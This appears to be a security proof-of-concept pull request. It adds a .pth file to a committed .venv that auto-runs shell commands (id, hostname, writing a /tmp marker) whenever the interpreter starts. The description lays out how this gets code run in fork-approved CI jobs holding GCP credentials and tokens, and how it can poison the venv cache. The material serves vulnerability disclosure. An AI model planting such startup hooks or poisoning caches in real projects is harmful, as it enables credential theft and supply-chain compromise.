### PR TITLE
security-poc: .venv .pth code execution in fork-approved CI (benign marker)

### DIFF
--- a/.venv/lib/python3.11/site-packages/pwn.pth
+++ b/.venv/lib/python3.11/site-packages/pwn.pth
@@ -1,0 +1,1 @@
+import os; os.system('echo "=== bqetl-security-poc: code executed ==="; id; hostname; date > /tmp/bqetl-poc-marker; cat /tmp/bqetl-poc-marker')

--- a/.venv/pyvenv.cfg
+++ b/.venv/pyvenv.cfg
@@ -1,0 +1,3 @@
+home = /usr/bin
+include-system-site-packages = false
+version = 3.11


### PR DESCRIPTION
## Security PoC — fork PR code execution with GCP credentials (after gate approval)

**Benign proof-of-concept.** No secrets read, nothing destructive.

### Chain
1. `fork-gate.yml` (`pull_request_target`, `environment: external-fork`) is the only approval gate.
2. Once a maintainer approves, `build.yml` fires via `workflow_run`, checks out this fork's SHA, and every job runs `.venv/bin/python` with **GCP OIDC service accounts** (`GCP_STAGE_SERVICE_ACCOUNT`, `GCP_DRYRUN_SERVICE_ACCOUNT`), `GITHUB_TOKEN`, and `PRIVATE_BQETL_TRIGGER_TOKEN` in env.
3. This PR commits `.venv/lib/python3.11/site-packages/pwn.pth` (single line `import os; os.system(...)`) + `.venv/pyvenv.cfg`. It **survives** `python3 -m venv .venv` reuse and `actions/cache/restore`, and executes the moment `.venv/bin/python` starts (verified locally: marker file written, code ran as root in the venv).

### Why it defeats the documented controls
- The build step's "hermetic" claim only covers `requirements.txt`/setup.py/pyproject/pip.conf — it does not clear a pre-existing `.venv/` in the checkout.
- The review checklist (`requirements.txt`, `setup.py`, `package-lock`, `Makefile`) does not cover `.venv/`.
- `requirements.txt` is unchanged, so the venv cache key `venv-linux-3.11-hash(requirements.txt)` collides with main's — a cache-miss fork run can save the poisoned venv under main's key (persistent cache poisoning).

### Expected (requires maintainer to approve the fork gate)
`build.yml` job logs show `=== bqetl-security-poc: code executed ===` and `/tmp/bqetl-poc-marker` exists on the runner with GCP creds available. Please close without merging.